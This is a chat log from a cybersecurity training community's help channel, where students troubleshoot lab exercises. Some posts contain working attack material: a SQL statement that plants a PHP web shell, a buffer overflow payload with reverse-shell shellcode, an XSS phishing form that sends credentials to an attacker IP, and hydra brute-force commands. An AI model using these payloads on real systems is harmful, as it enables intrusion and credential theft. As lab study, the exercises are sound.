You can also mount a vhd in Linux, but it is not as easy as in Windows
perhaps theres a script i can run to grab the FQDN?
I cannot seem to get it to work using guestmount and looking at the chat history it appears most give up and just transfer it to their Windows Host.
.
The target is the name server. Yes, port 53 TCP and UDP is probably open 😉
Use dig or nslookup
Enter key or passphrase ("/dev/sda2"):
guestmount: no operating system was found on this disk
If using guestfish ‘-i’ option, remove this option and instead
use the commands ‘run’ followed by ‘list-filesystems’.
You can then mount filesystems you want by hand using the
‘mount’ or ‘mount-ro’ command.
If using guestmount ‘-i’, remove this option and choose the
filesystem(s) you want to see by manually adding ‘-m’ option(s).
Use ‘virt-filesystems’ to see what filesystems are available.
If using other virt tools, this disk image won’t work
with these tools. Use the guestfish equivalent commands
(see the virt tool manual page).
┌─[✗]─[htb]─[~]
└──╼ $ls -l /media/mnt
Found it in resources
Guys has anyone done the NTLM Relay Attacks Module?
I'm stuck on the Skill Assessment, can anyone give me hints?
moving past that now.. for the actual zone transfer i get "transfer failed" with dig. "dig axfr ns.inlanefreight.htb @10.129.128.1270"
This is a guide on how to access a BitLocker-encrypted Windows volume from Linux, useful in cases of dual-booting Windows 10, 8 or 7, and a Linux distribution. It covers how to decrypt and mount the BitLocker partition from the command line, as well as how to add it to /etc/fstab, so it's automatically mounted on boot.
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
i prefer the medium article as it's much simpler to follow along almost completely without thinking
Thanks!
check the ip (last octet)
You can configure a zone so that only certain servers are allowed to perform a zonetransfer
```
└──╼ [★]$ xfreerdp -cert-ignore /v:10.129.153.218 /u:john /p:november
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - freerdp_post_connect failed
```
Getting connection reset when trying to rdp
https://academy.hackthebox.com/module/147/section/1327
wrap the error in triple backticks ```
so it will look like this
Done.
Doing it from the pwnbox
well you cracked it for winrm first off; are you sure that user has rdp privs?
used hydra with the rdp:// so I doubt that its going to be the same as winrm
read the question :)
hydra showed it as a valid password
for the rdp protocol, not sure about the user having privileges for that since i don't have access to the remote server yet
...Then you're not looking at the right user
each user for each question is different
something you CAN do to limit your username list down is to go to C:\Users
Found it, console was cropped so didn't see the entire privileges
Ohh , that means that 8.8.8.8 wont work
Well also Windows 10 supports VHDX
No public DNS resolver will work.
.htb is not an official TLD
The Windows OS is natively able to mount a VHD- or VHDX-based virtual hard drive file in the same way that any other type of removable media can be mounted and accessed by the operating system.
Ohh okay, that is noted
many people are new to HTB
this isn't a general chat
you can read #welcome on how to access more of the server :)
if you have a question regarding an academy module feel free to ask though
thank you
Hey im on the Pivoting Module and cant figure out what i am missing on the webserver pivoting with rpivot.
My "proxychains firefox-esr" times out...
Those are my rpivot shells
wtf why this works
can i dm you really quick?
nvm i got a whitespace in my clipboard which htb didnt recognize 
yea
i think firefox didnt work since it tried to do outbound connections which timed out since its a internal network
I need a hand for what seems a rather simple affair in the Footprinting module, SMTP chapter, last question. I need to enumerate users so I tested with nmap's script and smtp-user-enum, tested the different commands with each, but none of them gives me the answer.
nmap just shows every single name from the list as valid and smtp-user-enum shows none as valid.
use the actual smtp-user-enum tool, not the nmap script
yeah I used that
if I test vrfy root I get something where I got nothing for AAAA so it seems you do not.
I have not
I let it run until it's done. They give you a small list of names to test
yeah
if you add a domain then it seems to always succeed with VRFY
that's what it is
:)
I mean, it succeeds but it's not right
there's only one user
should be
but yeah adding the domain makes it false positive for whatever reason
Anyone working on Intro to Assembly? I have the correct answer to an exercise, like 100% correct, and I cannot figure out why HTB wont take the answer in literally any format I put in. I am about done with the module, but won't be able to complete it until I can get this one page completed lol
OH MY GOD I GOT IT. Nevermind 
a few months to a year depending on experience
increasing the wait time on the command might help
I got it with metasploit then I made tests with smtp-user-enum knowing which one is the right one and I am getting the right answer randomly, even with the same parameters. Using different methods, wait times and thread count
wait time >= 15
I get it randomly at 10
Hey folks, working on the skills assessment for secure coding. I think I'm gonna need JSNice for at least renaming the local variables, but this is the output I receive.
seems like 15 sec wait time and 10 threads worked
SMTP is a slow service is why
hello everyone, i'm having some issues with the first part of the skill assessment for Game Reversing & Modding "Fixman", which is patching the fact that i cant press space to launch the game, i'm using DnSpy and i modified CheckStart(), Start() and Update() methods, can someone give me some help ?
thanks
Hi guys, I have an issue with the Linux Fundamentals module's File Descriptors and Redirections section.
Question: How many files on the system have the ".log" file extension?
The command I used: locate *.log
My answer: 24 (WHICH IS INCORRECT)
locate is obviously the wrong command. 😉
😉😉
Please, tell me if it's possible answer at the question or we can only suggest
I tried this command too: find / -type f -name "*.log" | wc -l
What is the logic behind this?
anyone can help me with command injection - skills assessments?
Is it for error redirection?
That's not error redirect , it's output redirect
At the end of your command add | wc -l which counts the output lines
Thanks @fathom pendant .
Sorry, I'm stuck with this section on file descriptors and redirections. I am unable to wrap my head around it, honestly!
I tried youtube to learn this section but nothing helped much.
any ideas on this here. I don't know if many people have completed this module yet
it's totally normal you just need to read the section carefully couple times , and you will understand how to solve the challenge , and remember google is your friend
Anybody knows whats up here? Im trying to DNS tunnel and this error is not explained in the sections so far
anyone can help me with command injection - skills assessments?
Hi all, I'm working on the Web Fuzzing skills assessment module, and I've been stuck on this question for a few hours now.
Q: "In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?"
I tried running the ffuf command with the burp text file, targeting the first param (FUZZ=key) and I get something back (for the sake of not spoiling for others). Since I'm expecting another param I then tried FUZZ=key&FUZZ2=key, but didn't get anything back.
Lastly, I tried param fuzzing on other pages, but haven't found anything of significance so I'm truly lost at this point. Any ideas of what I could be missing?
takes the output of the last command as the input of the new command 😉
where are you stuck?
Guys, I have got another question I am stuck with in the same module: Linux Fundamentals, section: File Descriptors and Redirections.
Question: How many total packages are installed on the target system
Commands I have used: dpkg -l | wc -l and dpkg --get-selections | wc -l
And to my surprise both of these commands give a different answer: 748 and 743 respectively, and none of them is correct.
because not all are installed
And both the answers are incorrect 😢
you’re using a wrong payload
take your command a step back to see what you missed😉
I am in ATTACKING WEB APPLICATIONS WITH FFUF -> Sub-domain Fuzzing
I think it isn't hard to solve, but when I try to execute a command
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/
I receive
:: Progress: [4997/4997] :: Job [1/1] :: 341 req/sec :: Duration: [0:00:27] :: Errors: 4997 ::
Let me give it another shot and get back to you, if it works.
can i dm?
the fuzz keyword might be case sensitive idk
@south folio Did you add http://fuzz.inlanefreight.com/ to your /etc/hosts file?
yes
and should be .htb or .local idk
cat /etc/hosts
134.209.24.248 inlanefreight.com
I wrote it correctly with the right case, but Discord converted the FUZZ word to lowercase
Is your target ip still valid?
If I put the URL in the browser I can navigate the website. But the ping command is trapped
@south folio
I have received from ping command
Hi @lusty thicket , I had no luck figuring out the right command or what I missed. Can you help me to figure it out?
ping inlanefreight.com
PING inlanefreight.com (134.209.24.248) 56(84) bytes of data.
Trying using the -H command, that shouldn't make a difference, but it's worth a try
inlanefreight.com is a real site that they setup for certain modules, so make sure the module youre on actually uses that one
cause 90% of the time its inlanefreight.htb or inlanefreight.local
Why should he do that?
ping inlanefreight.htb
ping: inlanefreight.htb: Name or service not known
yes you would have to add it to/etc/hosts if the module doesnt use the .com one
No I need to scan for sub-domain and I need to have a valid url. This is not present in the LAN
which module and section are you doing
@acoustic owl Because if it's not found in the DNS, then it will defer to /etc/hosts and try to match an IP from there
hes passed the exam, he knows how etc hosts work. You dont need to add a .com to etc hosts
thats what he was pointing out
Oh, okay
ATTACKING WEB APPLICATIONS WITH FFUF -> Sub-domain Fuzzing
Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?
Module: Attack Web Apps, Section: Exploiting Web Vulnerabilities in Thick-Client Applications -- actually modified the invoker.java file as follows:
```java
import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
    String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
    logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
    if (AccessCheck.checkAccess(methodName, this.user)) {
        return "Error: Method '" + methodName + "' is not allowed for this user account";
    }
    this.action = new ActionMessage(this.sessionID, "open");
    this.action.addArgument(foldername);
    this.action.addArgument(filename);
    sendAndRecv();
    if (this.response.hasError()) {
        return "Error: Your action caused an error on the application server!";
    }
    // Backslashes must be escaped inside a Java string literal
    String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
    // Write the returned file content to the local desktop path
    FileOutputStream fos = new FileOutputStream(desktopPath);
    byte[] content = this.response.getContent();
    fos.write(content);
    fos.close();
    return "Successfully saved the file to " + desktopPath;
}
<SNIP>
```
-- but now i get error: Failed to open file '/opt/fatty/files/..s/files' when running app ------- any hints?
No, first the hosts file is queried, then the DNS resolver.
However, the hosts file does not contain a protocol such as http://.
inlanefreight**.com** is a publicly accessible site. The domain is correctly resolved by the DNS resolver.
okay good, that's one of the rare ones that uses .com so ignore /etc/hosts recommendations
@acoustic owl I see, and that makes sense. Thanks for clearing that up
have you got it now?
The Password Attacks module states the following:
"Single Crack Mode is one of the most common John modes used when attempting to crack passwords using a single password list. It is a brute-force attack, meaning all passwords on the list are tried, one by one, until the correct one is found."
Would this not be a dictionary attack?
I also found the following over on StackExchange: https://security.stackexchange.com/a/37074
theyre interchangeable in this context
If we modify the /etc/hosts with Ip and names, theoretically we don't have the problem
I cat also write in the /etc/hosts
134.209.24.248 inlanefreight inlanefreight.com
and I can use both the name
you dont need to do this
Ok but the ffuf don't work
works for me
you’re obviously doing something wrong
@south folio I checked, your ffuf is against the http service
although it works for me on either
What the content of your /etc/hosts?
Because I need only the IP address of inlanefreight.com, and if it's incorrect it cannot work.
Nothing. I told you to ignore that part
delete inlanefreight.com from your hosts file
that’s a public domain man
Now it's clean:
```
# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-un7abfxl8f htb-un7abfxl8f.htb-cloud.com
```
Uhm
Discord converted a pound character
Yes I can ping also from my Pc and the Whois show me same Ip address: 134.209.24.248
ping inlanefreight.com
PING inlanefreight.com (134.209.24.248) 56(84) bytes of data.
Could I get some help with the IMAP/POP3 host based enumerations?
Getting stuck where it asks for the admin email address
When connecting to openssl s_client -connect [IP address]:pop3s
I can type USER Admin and I get a "+OK" response meaning its an available email account on the server
trying to login with the credentials robin:robin but I might be able to figure this out
that’s what you’re supposed to do
I kept on getting this error
No idea what I'm missing here
you should enter a command tag before the actual command
command tags.. 1 a
..
This worked! thank you for you assistance

My brain did not process the ones above where they clearly show the command tags 
guys, can't find which versions of polkit are vulnerable to local PE
pkexec is present from 2009 till 2021
but i want to know all the version that are affected any idea
I'm doing the Session Security module, and the Attack Box is not on the page at all? Or in any other page?
It's not that it's not spawning, it's literally not there.
hi guys ive been stuck on this for a couple of days does any know why im not able to run this module> intro to brute force > username brute force
as it says you need to use a valid password file
File not found, yet locate says it exists
Is the issue
Try the /usr/share/ one
crying
wordlists* you missed an s

can someone help me with command injection skills assessments?
dontasktoask
How long is it supposed to take to brute force the password for ssh
cheers.
You are given the password list and username
Aren't we supposed to use cewl to get the password list
Can't say as I haven't looked at the module in a while. Read what the module says. I know some modules that involve some sort of bruteforce/dict attack has a file that contains the username and password.
hint: make a mutated version of the given wordlist (using the given rule), all from the Resources (hence the second name). As for the brute forcing time, it will take a while, but if you don't want to wait, cut the first 17000 words of the list
Well trying password.list mutated mutatednow instead of cewl
Thank's, trying right now
still taking insanely long
try ftp, and give it more threads
may i know how you created the mutated? i did with custom rules and password.list i found on HTB resource - i get around 187xxxx combination
im doing the same thing - using ftp with 48 threads, also i split the mutated list into several files, still it takes time! any tips?
btw i used hashcat command in the cheatsheet
Did you use the provided password list and rules list from the zip file
yes
I wouldn't recommend splitting the mutated list up but that's personal preference
do you recommend doing this - ||cat mutated.list | sort | uniq > new_mutated.list||
If you used the command from the module it should already have sorted the unique passwords
That's what sort -u does
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
used the exact command
a hour later
hydra -l sam -P mut_password.list ssh://10.129.184.26
now using this to brute force the ssh
Just finished the AD module!! I'm not going to lie, I need to do it again soon. it was a steep learning curve for me and I feel I know nothing... did most of the Assessments using tips, asking for help....! want to say thanks to HTB team for their good work and this great community for being always helpful
introduction to whitebox or whitebox 101, which one should i get?
hydra -l sam -P mut_password.list ftp://10.129.184.26 -t 20
If you're starting out, Intro to WB would be better imo.
WB 101: Command Injection recommends you to have completed Secure coding 101.
use -T 48 or higher
hydra -l sam -P mut_password.list ftp://10.129.184.26 -t 64
yes
Avoid using --force if possible 🙂
why? thats how it is suggested to do the mutation
--force is a command for developers and people working on the code base
it should NOT be used by users
it will bypass blocking warnings and could lead to very poor or unexpected behavior from hashcat
even to the degree of false positives/negatives
thats for creating a mutation wordlist tho
i mean, sure, but would you want to bypass blocking errors in your list creation?
what false positive are you fearing in that
the rule engine is still running similar to how it would during an attack
errors in that will mean errors in your output there as well
but again, poor behavior in general like crashes or memory problems are never good
even if it doesnt lead to worst case scenario
i use --force because god protects me from unintended behaviors 
for the people who are still struggling with the mutation, use "||hashcat --force password.list -r custom.rule --stdout > mut_password.list||", then if the output is 187xxxx lines use ||cat mutated.list | sort | uniq > new_mutated.list|| to reduce it to 94k, then use hydra to crack ftp instead of ssh. use a higher thread count and verbose. i cracked it in an hour.
and i keep adding warnings specifically to that flag because of people using it 🙂
agreed
hm why is --force suggested to be used in the module then, should probably change it if it shouldn't be used
it's been an ongoing issue with like, every tutorial ever
you would not believe the amount of issues we get because of old tutorials suggesting stupid stuff like that
or using just outdated or generally poor advice
add in the fact that chatGPT knows exactly 0 anything about how to operate hashcat and you get a LOT of unhappy people in my DMs and in our discord server/forums/github issues
imagine asking chatgpt how to use hashcat instead of rtfm
lol, and with all that documentation we have too
its not perfect but it's a hell of a lot more than most tools
my favourite literature is the hashcat examples page
it's also built into the tool as well 🙂
dynamically created and queried from the hashes present in each module for self testing during kernel init
oh dang didn't know that
I'll suggest a change to not use --force in #858470491676737536 then
i think it's been brought up before unfortunately
welp here we go again I guess
there was a hashcat module as well
though i haven't heard much about it recently
not sure if it finally got rewritten/pulled/etc.
it's still there.. is it also not good? 😅
it's not bad, it's just aging quickly
lots of stuff that was outdated almost immediately
like the WPA section
ah I see, I suppose that seems like a drive by mention, will definitely need something more in depth for WPA related things
that would be pretty awesome to have the hashcat module penned by a dev
Thank's, will remember that.
hi guys. I'm on the password attack module and trying to install crackmapexec. I've tried pipx install crackmapexec, docker pull byt3bl33d3r/crackmapexec, sudo apt install crackmapexec. None of them works. Can anyone help? Thanks in advance.🥹🥹🥹
and i'm already stuck on the first question. which user list should i use?
use netexec instead, it's same as cme but better https://www.netexec.wiki/getting-started/installation/installation-on-unix
Thank you
How long are passwords usually supposed to take to crack in a htb academy module
highest 5 mins
if its more than that then youre in a rabbit hole
Yeah, then I am in one
uh if you're in the password attack module it will take longer
I doubt its not 2 hours
does that apply to academy modules, isn't that for boxes 
same with modules
password attack module would disagree with that
i haven't found one that took more than 5 mins (idk if they updated the module lemme check)
nope they didnt
i download the resources provided, i think it's taking forever to brute force
Use a different list
Unless we're talking about brute-forcing and not cracking, then you definitely have some lengthy waits in the password attacks module
cmd=ls
https://academy.hackthebox.com/module/147/section/1391
Using the provided password.list then mutating it with the provided rules
Then using hydra to brute force the password with the user sam as provided
*Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. *
So we are talking about brute-forcing
Yes, sorry about the confusion with me saying cracking
SSH takes forever to brute-force, try a different service or you will indeed be waiting for hours
used ftp for 2 hours
hydra -l sam -P mut_password.list ftp://10.129.134.158 -t 64
Will just use this again and if it doesn't work, will just skip the module
I suggested -t 48 for a reason, some people experience issues where 64 threads skips over the correct password, not always the case, but still
Overall, this section sucks because of the long unnecessary wait, the rest of the module gets better and contains information you're unlikely to see anywhere else, I don't recommend skipping it
hey guys, i have an issue with the Windows fundamentals skills assessment
basically im asked to make a user named jim and then find his SID, i have found the correct SID using the wmic command, but when i input it the question says incorrect answer
i have googled the answer and found that it directly matches the SID i provided.
very confused
anyone had any issues with this?
Got the password
Also found the flag
strange
hello guys im doing the skills assessment for linux pe
and im stuck on flag5
i can run a command as sudo but seems like it's not dropping a root shell. it was an easy skills assessment but flag 5 is driving me crazy
What does the header on the title page say when opening the aquatone_report.html page with a web browser? (Format: 3 words, case sensitive)
sorry but i dont get what it is asking lol
https://academy.hackthebox.com/module/116/section/1512
Attacking DNS Problems..?
||
I tried editing the /etc/hosts file, including inlanefreight.htb as well as the relevant target IP address, however, I am unable to dig for any name servers using the dig ns inlanefreight.htb command (returns no name servers). Without a name server, I was unable to proceed. Any hints on this? Thanks!||
if your net connection is mid it can take up to 15
dig ns inlanefreight.htb @ip
So editing the host file is not enough?
no
Hmm alright guess I have to review my DNS module on this..
you still need to tell it where to query from
otherwise it's attempting to use public DNS servers and will fail
Gotcha!
anyway i found a way to do so but idk if its the right way i didnt use the sudo -l if anyone done it with sudo -l i want to know cuz it didnt work for me
try to recreate what the commands did in the section
Yeah I don't understand what the question is asking
the first words you see on the html page man
you know what an html title is yeah?
anyone 
great so the answer format is xxxx xxx xxxx
3 words
you are not helping lol
hi guys is academy worth it? i completed old modules 1 year ago lfi wordpress hacking kinda liked it there was tricks which i never seen elsewhere. I'm considering whether the new modules offer similar content and value
for example modern web hacking
white box testing
im doing cpts path and content is great, totally worth the money
isn't it just right there when you open the report lol
^
thats what i thought but nothing i tried worked lol
lmao nevermind got it
it was the first thing i tried but i guess i copied a new line or a space or something and it didnt like it
so i was trying everything else possible and was confused
so
i have the flag5
i did it by exploiting the sudo version
not the sudo -l
part and im pretty sure i need to do it the sudo -l
is there something when you run sudo -l?
Write on one line or the slowmode will be increased
i tried multiple times nothing and my shell is fully interactive btw
sorry 
what error did you get
sure
hey everyone !
i stuck in this module https://academy.hackthebox.com/module/147/section/1322
Can someone help me ?
The task states that it is necessary to connect via SSH to the user kira with the cracked password. The thing is, I completed this module two months ago, but due to circumstances, I didn't finish it completely. Now, I have no idea where to find the password for it.
Should have saved the password
It's in an earlier section that talks about firefox iirc
But it's like the first few sections
I was saving, and it turned out that my virtual machine broke, and all the data I was storing got erased
thanks
¯\_(ツ)_/¯
Module: Attacking Common Applications - Skills Assessment II
Question: What is the FQDN of the third vhost?
I have tried to dig all 3 hosts with @ip, did not get anything in return. All hosts added.
;; no servers could be reached
Please someone help me, I have answered all but this.
Hi
Please does anyone know why Firefox keeps timing out when running it with proxychains (rpivot) section.
I'm pretty sure my commands are correct
What have you tried for enumerating possible vhosts?
Also, if you answered the other questions I think you should have the answer for this also. Maybe the format of your answer is what is wrong.
Thanks for this, was at the same spot and wondering if I was doing anything wrong or if it was just gonna be a long wait. Didn't want to wait 15 hours to find out if I was doing it wrong lol.
Got it through ftp in 15 minutes
Attacking Common Services - Easy , Help Needed
||Tried searching up on some help on forums after managing to find out that I would need to upload a webshell. Unfortunately, the forums gave a website that requires me to have a metasploit module which I would like to avoid (and can't find anyway)
Using SQL to upload a shell in MariaDB, I tried the following SQL Command Injection:
SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {system($_GET['cmd']);} ?> </pre></BODY></HTML>" INTO OUTFILE 'C:\xampp\htdocs\cmd.php';
However, when I navigate to my backdoor shell, it appears that it is giving this error:
Fatal error: Uncaught Error: Call to undefined function system() in C:\xampp\htdocs\cmd.php:1
Stack trace:
#0 {main}
thrown in C:\xampp\htdocs\cmd.php on line 1
Any ideas on what may be going on? Thank you!||
guys in this module : Coercing Attacks & Unconstrained Delegation , we are not given a windows machine to rdp to simulate the attack, only kali. what am i missing here?
good to hear!
why use such a complicated php shell? you just need <?php system($_GET['cmd']);?>
I need to get a shell to look through the directories for the file if I not wrong
The shell you provided can only execute one command per link if you know what I mean haha
So I would like an 'interactive shell' if possible
Anyone know why i am getting a SEGMENTATION Fault in this case here. (Module: STACK-BASED BUFFER OVERFLOWS ON LINUX X86)
This is the command:
```
$ env - gdb
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r $(python -c 'print "\x41" * ( 2064 - 95 - 124 - 4) +"\x90" * 124 + "\xb8\xb3\x39\x2b\x40\xdb\xde\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\x83\xed\xfc\x31\x45\x0e\x03\xf6\x37\xc9\xb5\xc9\x9c\xfa\xd5\x7a\x60\x56\x70\x7e\xef\xb9\x34\x18\x22\xb9\xa6\xbd\x0c\x85\x05\xbd\x24\x83\x6c\xd5\xc9\x73\x8f\x24\x5e\x76\x8f\x36\xdd\xff\x6e\x86\x87\xaf\x21\xb5\xf4\x53\x4b\xd8\x36\xd3\x19\x72\xa7\xfb\xee\xea\x5f\x2b\x3e\x88\xf6\xba\xa3\x1e\x5a\x34\xc2\x2e\x57\x8b\x85" + "\xf5\xd4\xff\xff"')
```
The return address is specified as: 0xffffd4f5 on which we find NOP instructions. Prior to executing RET in leavemsg():
```
=> 0x5655573a <+173>: ret
(gdb) x/x $esp
0xffffd5bc: 0xffffd4f5
(gdb) x/x 0xffffd4f5
0xffffd4f5: 0x90909090
```
104 bytes later we find the first four opcodes:
```
x/x 0xffffd4f5+104
0xffffd55d: 0x2b39b3b8
```
Execution will hit the NOP sled and eventually spawn a reverse shell but it will kill it right away due to segfault:
```
(gdb) x/i 0xffffd4f5
0xffffd4f5: nop
...
Hits SHELLCODE and creates reverse shell
...
htb-student@nixbof32skills:~$ nc -vnlp 4163
Listening on [0.0.0.0] (family 0, port 4163)
Connection from 127.0.0.1 53950 received!
```
The program will then kill the shell due to segmentation fault:
```
0xffffd5b8 in ?? ()
```
Shellcode:
```
msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=4163 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
```
you can get a better shell by sending a reverse shell with the shitty web shell. writing a complicated shell with SQL is just asking for trouble because you need to worry about escaping characters and formatting
Oh yes... I'm actually dumb haha. But just to confirm can I enter blank spaces in the shitty Web shell using net cat? Away from my pc atm just had this thought
like spaces in commands? just url encode it
Aite I will research on that. Thanks for the idea tho much appreciated🙏
I need to verify a method that I am trying related to Windows PE module and pillaging section. Can i dm someone who is available
Hey
Where can i find the chats for Cryptography or the Challenges from the hackthebox app.
Can somebody help me up?
Can't seem to spawn a target IP in my modules. Stuck on Target is spawning... Tried to reset a target and it never spawned a new one.
Anything I should be doing on my end?
@modest girder having the same issue here
Modules targets don't spawn! 😦
Well at least we know we're all in this together lol
@modest girder and @radiant flicker, I've tried changing the VPN server, and Europe server 2 seems to work, targets spawn. 👍
Thanks man I'll give that a try.
👍
Hi, I was reading into sekurlsa::pth vs asktgt and found a /ptt flag in Rubeus can someone give me an example as to how to use it. I do not get luid part i.e what is it and how to get that
any word on the target machines coming back online at some point soon?
last modules
i will redo the whole path after i finish
with suggested boxes
this course really helped me to understand things. i still remember before i started i couldnt do anything but now at least i can understand things and i can do some easy things totally by myself
Need to speak to a person? Learn how to reach our support via HTB Labs.
@bright quiver Please contact support if you're still having issues.
@slender shoal ok thank you
https://academy.hackthebox.com/module/113/section/2164#questionsDiv -- machine wont start anymore!?
Is anyone having trouble spawning modules. I'm trying to spawn the shells and payloads live engagement for a while now, and it just loads. I've disconnected from vpn , reconnected, deleted ovpn file , redownloaded it, logged out , and then back in and it still doesn't spawn the target. I have 1 question left to finish that module.
well i guess they are.
Need a nudge on Footprinting - IPMI
Ran metasploit found the username and a password hash, module says something about using ||hashcat|| for a specific IPMI for 8 chars etc... I ran ||hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u <hash>|| but that didn't work... It wants the cleartext password, so I am just a little stuck on how to move forward
pm me
try using the rockyou wordlist
hello guys I'm having problems with this question : I don't receive the logins, why ?
double check the xss payload that you used (make sure it works). And it looks like that the machine expired try to restart it...
Module: Attacking Common Services
Section: Attacking FTP
I have a problem with the machine in this task. When i try to connect to the ftp service it says 'Connection refused', it does the same thing when i try with netcat too. Am I doing something wrong or is it the machine that is not working properly ?
reset and try again
I did, still the same
reset, wait 5 mins and then try again
aight
I just turned my payload on and off, I receive my logins but I don't succeed in connecting with my logins
a:a are not the valid login credentials, when you look at the first screenshot where it says 'Connection from' you can see that it's your own ip, it was probably you testing
still did not work, i think i'll just skip it for now
it really is just a common problem
Yeah i'll try again later
am I supposed to retrieve other identifiers? How the course simply presents a payload
First you need to find the vulnerable field
Once you find it you can insert your payload there, send the url to victim in the indicated page and if you wait a bit you should receive a request with the credentials
Has anybody here passed the Secure Coding: javascript 101
I received it but these are the ones I just returned
Here is my payload : http://10.129.148.195/phishing/index.php?url='/><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.141:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
did you send this payload to /phishing/send.php ?
Hi, under Linux Fundamentals on the Service and Process Management section, I entered the command:
systemctl list-units --type=service | grep "Load AppArmor profiles managed internally by snapd"
it works as the question asks but doesn't accept it as the answer. What else should I try?
try re-submitting the url and wait for a minute, you should normally see a request with admin credentials i just re-did the task
In Attacking Common services - DNS. I found a flag but it wont accept it...
this command should give you the answer make sure you didn't make any typo or add additional space at the end of the answer
dm me
anyone able to assist here...trying to install chisel on ||webadmin|| with a http.server, but it isn't working - any other method to work better maybe? File is in my main directory.
||webadmin@inlanefreight||:~$ wget http://10.10.14.212:1234/home/htb-ac-814020/chisel/
--2023-12-13 15:07:48-- http://10.10.14.212:1234/home/htb-ac-814020/chisel/
Connecting to 10.10.14.212:1234... connected.
HTTP request sent, awaiting response... 404 File not found
2023-12-13 15:07:48 ERROR 404: File not found.
you're fundamentally misunderstanding how http.server works
it opens up a webserver in the directory you launch it in
so you can't just do regular filepaths for it; it's local to whatever directory you launch in
hello, in htb challenge it s allowed to consult how an app work or not ?
i mean consulting files of the app
?
that's unrelated to academy modules there is a #challenges channel where you can ask for assistance but you need to link your account following the instructions in #welcome
launch the web server in the chisel dir
okay thx !
@fathom pendant and @orchid pine I am ....
unless i am using incorrect file formats for the type it is such as not being exe or so
yes I understand what you're doing
you're not understanding how it works
you don't need to specify a filepath